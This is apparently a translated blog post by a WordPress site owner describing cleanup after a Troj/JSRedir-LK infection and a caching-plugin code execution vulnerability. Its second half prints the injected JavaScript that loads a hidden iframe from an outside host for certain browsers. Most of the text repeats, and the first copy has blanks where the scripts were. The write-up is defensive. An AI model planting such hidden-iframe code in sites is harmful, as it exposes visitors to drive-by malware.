Troj / JSRedir-LK Trojan and WordPress Vulnerability
Literally today I finished sorting out an interesting and new task for myself - the ward site turned out to be in Yandex blacklist. The reason is Troj / JSRedir-LK Trojan (according to Sophos).
I’ll clarify: there are two sites in the blacklist at once, one of which is a subdomain of the second, and I will describe below what transformations have occurred to both of them as a result of the Trojan.
And this is what happened:
There are two scripts in the header.php file (subdomain),
and
,
in the file footer.php (subdomain) before - also a script with a link to ligaexpress,
and in the wp-includes folder of the parent site (domain) is the google-analytics.php file ending with the following code:
Curiously, the link js_kod2.src periodically changed.
It is also curious that in addition to Sophos himself, none of the antiviruses used have found anything. Neither the site nor the computer, which I after fussing with the site decided to check. But the Virus Removal Tool sofos utility found the very Troj / JSRedir-LK, and in addition also the Troj / JSRedir-JK, both in Temporary Internet Files. For which I now strongly recommend it [1].
And also I will recommend a plug-in for Wordpress Security WordPress [2]. He conquered me with the ability to scan files, including theme files and plug-ins, and compare them with those stored on WordPress.org. It is even a pity that by the time it was installed and the scan started, all the excess had already been removed.
And more about WordPress (about the very vulnerability mentioned in the topic of the article).
While I was looking for a hole through which a virus had penetrated, I found information that caching plugins (namely WP Super Cache 1.2 and earlier; W3 Total Cache 0.9.2.8 and earlier) found a vulnerability that allows a remote user to deploy and execute arbitrary Php code Read more about it here [3] and here [4].
So keep your feet warm and your plugins updated. And, yes, and do not store ftp passwords in Total Commander.
Thanks for attention.
')
Links to what is mentioned in the text:
1. Virus Removal Tool from Sophos (free)
2. Wordfence Security Plugin for WordPress
3. Detected dangerous vulnerability in caching plugins for WordPress, securitylab.ru
4. mfunc issue
I’ll clarify: there are two sites in the blacklist at once, one of which is a subdomain of the second, and I will describe below what transformations have occurred to both of them as a result of the Trojan.
And this is what happened:
There are two scripts in the header.php file (subdomain),
and
,
in the file footer.php (subdomain) before - also a script with a link to ligaexpress,
and in the wp-includes folder of the parent site (domain) is the google-analytics.php file ending with the following code:
function showBrowVer() { var data = browserDetectNav(); if (data[0]) { if ((data[0] == 'Opera' || data[0] == 'MSIE'|| (data[0] == 'Firefox' & data[1] <= 17)) & data[3] == 'Windows'){ var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://moradomedia.nl/new/php/one-style.php'; js_kod2.width = '2px'; js_kod2.height = '2px'; js_kod2.style = 'visibility: hidden;'; document.body.appendChild(js_kod2); } } } Curiously, the link js_kod2.src periodically changed.
It is also curious that in addition to Sophos himself, none of the antiviruses used have found anything. Neither the site nor the computer, which I after fussing with the site decided to check. But the Virus Removal Tool sofos utility found the very Troj / JSRedir-LK, and in addition also the Troj / JSRedir-JK, both in Temporary Internet Files. For which I now strongly recommend it [1].
And also I will recommend a plug-in for Wordpress Security WordPress [2]. He conquered me with the ability to scan files, including theme files and plug-ins, and compare them with those stored on WordPress.org. It is even a pity that by the time it was installed and the scan started, all the excess had already been removed.
And more about WordPress (about the very vulnerability mentioned in the topic of the article).
While I was looking for a hole through which a virus had penetrated, I found information that caching plugins (namely WP Super Cache 1.2 and earlier; W3 Total Cache 0.9.2.8 and earlier) found a vulnerability that allows a remote user to deploy and execute arbitrary Php code Read more about it here [3] and here [4].
So keep your feet warm and your plugins updated. And, yes, and do not store ftp passwords in Total Commander.
Thanks for attention.
')
Links to what is mentioned in the text:
1. Virus Removal Tool from Sophos (free)
2. Wordfence Security Plugin for WordPress
3. Detected dangerous vulnerability in caching plugins for WordPress, securitylab.ru
4. mfunc issue
Source: https://habr.com/ru/post/184124/
All Articles